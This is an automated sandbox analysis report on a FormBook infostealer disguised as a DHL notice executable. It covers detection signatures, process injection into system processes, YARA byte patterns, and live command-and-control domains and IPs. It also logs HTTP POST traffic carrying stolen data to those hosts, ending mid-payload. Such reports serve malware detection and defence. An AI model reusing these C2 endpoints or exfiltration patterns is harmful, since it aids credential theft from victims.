Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_Notice_pdf.exe

Overview

General Information

Sample Name:DHL_Notice_pdf.exe
Analysis ID:831175
MD5:771508cf2751f6dabe05758e4fa25fdf
SHA1:f6d7d33b6a340d2c370ca31a6f9677a2e5306486
SHA256:652948efee89fdc5c6d3dc7f65a16aafabd0d224c9fcd55e5f86573f1b2c4aa1
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DHL_Notice_pdf.exe (PID: 2080 cmdline: C:\Users\user\Desktop\DHL_Notice_pdf.exe MD5: 771508CF2751F6DABE05758E4FA25FDF)
    • zkvixbqxp.exe (PID: 6136 cmdline: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t MD5: BE5A6985BCDCA9064A05D26CFB8D082E)
      • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • zkvixbqxp.exe (PID: 5244 cmdline: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe MD5: BE5A6985BCDCA9064A05D26CFB8D082E)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmmon32.exe (PID: 5080 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x20dc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1a00a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x19e08:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x198a4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x19f0a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1a082:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xc7ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x18aff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1fb7a:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x20b2d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1efd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18217:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.zkvixbqxp.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.zkvixbqxp.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x1ffc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1920a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.zkvixbqxp.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19008:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18aa4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1910a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19282:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17cff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ed7a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fd2d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.zkvixbqxp.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.zkvixbqxp.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20dc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a00a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.38.8.8.851139532023883 03/21/23-08:08:13.337564
          SID:2023883
          Source Port:51139
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: DHL_Notice_pdf.exeReversingLabs: Detection: 46%
          Source: DHL_Notice_pdf.exeVirustotal: Detection: 42%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw==Avira URL Cloud: Label: malware
          Source: http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-XAvira URL Cloud: Label: malware
          Source: http://www.mindsetlighting.xyz/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.amirah.cfd/hpb7/Avira URL Cloud: Label: phishing
          Source: http://www.amirah.cfdAvira URL Cloud: Label: phishing
          Source: http://www.0dhy.xyz/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.adoptiveimmunotech.com/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.traindic.top/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-XAvira URL Cloud: Label: malware
          Source: http://www.admet01.clubAvira URL Cloud: Label: malware
          Source: http://www.adoptiveimmunotech.com/hpb7/jAvira URL Cloud: Label: malware
          Source: http://www.traindic.topAvira URL Cloud: Label: malware
          Source: http://www.yongleproducts.com/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.admet01.club/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.mindsetlighting.xyzAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: bohndigitaltech.comVirustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeReversingLabs: Detection: 27%
          Machine Learning detection for sample
          Source: DHL_Notice_pdf.exeJoe Sandbox ML: detected
          Source: 1.2.zkvixbqxp.exe.9f0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.zkvixbqxp.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL_Notice_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: DHL_Notice_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: zkvixbqxp.exe, 00000001.00000003.241452408.0000000019FF0000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000001.00000003.241643888.000000001A180000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zkvixbqxp.exe, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D31A0 FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 4x nop then xor ebx, ebx
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then xor ebx, ebx

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 198.46.160.97 80
          Source: C:\Windows\explorer.exeDomain query: www.denko-kosan.com
          Source: C:\Windows\explorer.exeDomain query: www.traindic.top
          Source: C:\Windows\explorer.exeNetwork Connect: 1.13.186.125 80
          Source: C:\Windows\explorer.exeNetwork Connect: 219.94.129.181 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.231.77 80
          Source: C:\Windows\explorer.exeNetwork Connect: 67.222.24.48 80
          Source: C:\Windows\explorer.exeNetwork Connect: 49.212.180.95 80
          Source: C:\Windows\explorer.exeDomain query: www.bohndigitaltech.com
          Source: C:\Windows\explorer.exeDomain query: www.0dhy.xyz
          Source: C:\Windows\explorer.exeDomain query: www.yongleproducts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.110 80
          Source: C:\Windows\explorer.exeDomain query: www.rifleroofers.com
          Source: C:\Windows\explorer.exeDomain query: www.kunimi.org
          Source: C:\Windows\explorer.exeDomain query: www.amirah.cfd
          Source: C:\Windows\explorer.exeDomain query: www.bisarropainting.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:51139 -> 8.8.8.8:53
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.0dhy.xyz
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: PRIVATESYSTEMSUS PRIVATESYSTEMSUS
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1Host: www.yongleproducts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.46.160.97 198.46.160.97
          Source: Joe Sandbox ViewIP Address: 67.222.24.48 67.222.24.48
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 34 31 77 37 77 71 4f 75 56 79 4f 63 53 76 5a 30 49 66 59 78 2d 70 50 78 5a 68 48 62 47 61 6f 7e 51 42 63 44 6c 76 79 4b 51 63 49 78 50 6f 46 46 30 39 36 71 5a 47 53 77 6f 59 68 37 39 51 63 61 42 76 41 61 53 75 78 5a 6f 4d 4e 65 53 4b 5a 68 6f 6f 34 35 59 5a 43 4a 39 28 54 6b 54 4c 35 36 74 50 34 7a 43 37 56 71 6b 56 4b 6b 65 67 46 30 53 75 6e 62 71 4f 49 75 5f 46 45 4d 6f 6c 6f 51 57 47 74 4d 36 4f 37 78 36 32 50 53 4a 54 78 37 45 7a 6b 54 31 72 78 72 36 63 72 6e 73 31 52 5a 30 76 59 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 59 46 77 38 58 7e 4f 28 31 79 4e 51 79 76 5a 74 59 66 63 78 2d 31 50 78 62 4e 58 62 56 32 6f 28 48 46 63 43 48 33 79 49 51 63 49 33 50 6f 5a 4c 55 38 35 71 5a 44 6a 77 71 77 66 37 34 41 63 59 54 58 41 63 43 75 79 46 34 4d 4d 64 53 4b 65 6c 6f 6f 34 35 59 56 30 4a 34 54 44 6b 57 6a 35 36 66 58 34 7a 45 76 53 6f 30 56 58 37 75 67 46 30 53 79 73 62 71 50 33 75 2d 78 74 4d 70 46 6f 57 54 4b 74 4a 72 4f 30 6e 36 32 43 59 70 54 6e 32 31 75 41 47 6e 54 36 75 73 77 53 76 4c 67 42 66 33 57 4b 46 69 5a 61 75 64 4f 75 32 4a 68 59 79 52 42 4f 63 37 71 48 47 52 4a 62 72 55 56 42 47 79 6f 31 75 72 30 64 5a 30 37 45 63 57 36 56 64 6f 62 57 71 59 39 7a 4f 55 54 4f 78 6e 7e 5a 33 65 61 78 30 69 49 61 69 37 77 46 4f 72 33 47 41 33 4d 36 39 48 48 55 72 47 36 46 38 39 33 34 48 53 39 45 4b 72 58 6d 38 68 59 38 74 55 6c 48 67 32 6e 4e 59 42 61 37 74 71 4b 70 32 54 49 4d 37 5f 34 35 7a 75 43 61 47 32 42 51 4c 46 65 74 66 74 59 48 71 77 4c 6f 73 6b 33 6c 73 78 73 6f 66 4d 78 42 6e 4c 51 4b 72 43 6b 67 6c 38 6e 68 4b 6b 69 52 76 31 67 5a 47 55 51 47 79 66 70 33 35 55 4f 54 50 55 55 54 66 6a 47 6b 53 4e 38 47 55 46 47 52 4b 4f 33 58 64 66 61 6d 7e 50 46 77 67 75 49 4d 36 69 65 63 4f 6c 4e 7a 54 61 4c 6e 37 52 75 51 4c 57 46 76 6d 4f 7e 6d 7e 65 47 45 62 58 62 4f 30 32 72 37 61 44 6c 62 69 31 4b 71 4b 32 50 37 44 47 69 38 79 37 49 79 58 32 46 46 77 6c 54 76 47 34 54 4a 56 38 39 71 79 74 57 31 70 4d 62 4d 31 55 49 5a 69 5f 48 35 61 32 64 30 33 6c 36 72 37 4c 30 67 57 61 4b 61 41 56 74 55 4e 45 76 58 39 5a 37 7a 6f 4a 6d 4f 74 54 33 6d 58 49 31 61 73 78 48 30 66 62 4e 4e 6a 70 4c 46 66 58 4b 75 4b 39 71 72 78 75 6d 5a 33 51 51 64 52 35 6e 53 50 45 4c 75 78 67 57 6c 6b 45 7e 31 42 37 5a 4c 55 58 71 4e 72 4a 69 38 4c 52 38 42 69 65 4b 4c 63 41 75 79 70 6e 7a 71 71 71 76 6f 46 46 77 46 6e 78 77 6d 76 66 42 67 34 37 63 75 43 48 70 41 46 69 38 55 57 75 59 77 54 49 4a 49 52 5a 28 52 41 53 4e 51 46 4f 52 77 76 6d 45 69 68 74 62 6b 61 59 6c 74 67 34 35 6f 62 6b 7e 47 46 76 49 2d 71 76 31 5a 45 57 65 46 58 45 68 6b 34 59 46 61 30 42 33 4c 47 4b 72 4f 42 41 51 57 58 30 7a 34 37 4c 73 46 32 66 70 61 54 70 45 36 53 59 36 52 61 5f 77 43 6d 37 64 4b 7e 68 58 53 58 67 4c 58 66 63 4a 47 79 47 42 74 47 6a 34 6b 66 63 66 6a 62 52 6d 79 28 46 53 33 76 35 52 6a 68 64 6b 59 4b 4f 62 30 7e 52 71 69 6e 4e 50 30 75 34 38 41 31 4e 28 6f 64 63 61 67 57 4d 78 33 66 69 7e 6b 53 5f 39 45 42 45 47 48 33 69 57 37 55 6b 74 51 73 78 35 57 45 51 55 44 54 65 36 5f 56 44 41 58 5a 39 79 38 36 69 67 64 52 4b 77 6d 70 72 48 6e 66 64 49 57 43 6a 42 39 31 79 59 43 77 5f 56 3
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 59 46 77 38 58 7e 4f 28 31 79 4e 51 79 76 5a 74 59 66 63 78 2d 31 50 78 62 4e 58 62 56 32 6f 28 48 46 63 43 48 33 79 49 51 63 49 33 50 6f 5a 4c 55 38 35 71 5a 44 6a 77 71 77 66 37 34 41 63 59 54 58 41 63 43 75 79 46 34 4d 4d 64 53 4b 65 6c 6f 6f 34 35 59 56 30 4a 34 54 44 6b 57 6a 35 36 66 58 34 7a 45 76 53 6f 30 56 58 37 75 67 46 30 53 79 73 62 71 50 33 75 2d 78 74 4d 70 46 6f 57 54 4b 74 4a 72 4f 30 6e 36 32 43 59 70 54 6e 32 31 75 41 47 6e 54 36 75 73 77 53 76 4c 67 42 66 33 57 4b 46 69 5a 61 75 64 4f 75 32 4a 68 59 79 52 42 4f 63 37 71 48 47 52 4a 62 72 55 56 42 47 79 6f 31 75 72 30 64 5a 30 37 45 63 57 36 56 64 6f 62 57 71 59 39 7a 4f 55 54 4f 78 6e 7e 5a 33 65 61 78 30 69 49 61 69 37 77 46 4f 72 33 47 41 33 4d 36 39 48 48 55 72 47 36 46 38 39 33 34 48 53 39 45 4b 72 58 6d 38 68 59 38 74 55 6c 48 67 32 6e 4e 59 42 61 37 74 71 4b 70 32 54 49 4d 37 5f 34 35 7a 75 43 61 47 32 42 51 4c 46 65 74 66 74 59 48 71 77 4c 6f 73 6b 33 6c 73 78 73 6f 66 4d 78 42 6e 4c 51 4b 72 43 6b 67 6c 38 6e 68 4b 6b 69 52 76 31 67 5a 47 55 51 47 79 66 70 33 35 55 4f 54 50 55 55 54 66 6a 47 6b 53 4e 38 47 55 46 47 52 4b 4f 33 58 64 66 61 6d 7e 50 46 77 67 75 49 4d 36 69 65 63 4f 6c 4e 7a 54 61 4c 6e 37 52 75 51 4c 57 46 76 6d 4f 7e 6d 7e 65 47 45 62 58 62 4f 30 32 72 37 61 44 6c 62 69 31 4b 71 4b 32 50 37 44 47 69 38 79 37 49 79 58 32 46 46 77 6c 54 76 47 34 54 4a 56 38 39 71 79 74 57 31 70 4d 62 4d 31 55 49 5a 69 5f 48 35 61 32 64 30 33 6c 36 72 37 4c 30 67 57 61 4b 61 41 56 74 55 4e 45 76 58 39 5a 37 7a 6f 4a 6d 4f 74 54 33 6d 58 49 31 61 73 78 48 30 66 62 4e 4e 6a 70 4c 46 66 58 4b 75 4b 39 71 72 78 75 6d 5a 33 51 51 64 52 35 6e 53 50 45 4c 75 78 67 57 6c 6b 45 7e 31 42 37 5a 4c 55 58 71 4e 72 4a 69 38 4c 52 38 42 69 65 4b 4c 63 41 75 79 70 6e 7a 71 71 71 76 6f 46 46 77 46 6e 78 77 6d 76 66 42 67 34 37 63 75 43 48 70 41 46 69 38 55 57 75 59 77 54 49 4a 49 52 5a 28 52 41 53 4e 51 46 4f 52 77 76 6d 45 69 68 74 62 6b 61 59 6c 74 67 34 35 6f 62 6b 7e 47 46 76 49 2d 71 76 31 5a 45 57 65 46 58 45 68 6b 34 59 46 61 30 42 33 4c 47 4b 72 4f 42 41 51 57 58 30 7a 34 37 4c 73 46 32 66 70 61 54 70 45 36 53 59 36 52 61 5f 77 43 6d 37 64 4b 7e 68 58 53 58 67 4c 58 66 63 4a 47 79 47 42 74 47 6a 34 6b 66 63 66 6a 62 52 6d 79 28 46 53 33 76 35 52 6a 68 64 6b 59 4b 4f 62 30 7e 52 71 69 6e 4e 50 30 75 34 38 41 31 4e 28 6f 64 63 61 67 57 4d 78 33 66 69 7e 6b 53 5f 39 45 42 45 47 48 33 69 57 37 55 6b 74 51 73 78 35 57 45 51 55 44 54 65 36 5f 56 44 41 58 5a 39 79 38 36 69 67 64 52 4b 77 6d 